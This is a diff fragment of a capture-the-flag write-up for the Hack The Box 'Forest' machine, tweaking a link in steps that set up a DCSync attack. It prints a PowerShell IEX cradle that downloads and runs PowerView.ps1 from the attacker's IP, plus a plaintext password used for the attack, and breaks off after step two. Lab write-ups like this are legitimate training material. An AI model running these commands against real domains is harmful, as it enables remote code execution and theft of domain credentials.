cyber-shinobii/writeups/htb-forest.md

 ![image](https://user-images.githubusercontent.com/48168337/166678947-15b1789b-8a27-4ddc-85fc-563b6c804881.png)

 Now we run the Dsync attack steps from Bloodhound.
-The only thing we'll need for this to work is the PowerView.ps1 script (*https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1*).
+The only thing we'll need for this to work is the PowerView.ps1 [script](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1).
 This script is the first thing that gets executed.
 Make sure you're hosting the script via http (python webserver) so we can execute it.
 Once you're http service is running use the lines below, one a time, to setup the dsync attack.

 1. IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/PowerView.ps1')
 2. $SecPassword = ConvertTo-SecureString 'olinesecurity' -AsPlainText -Force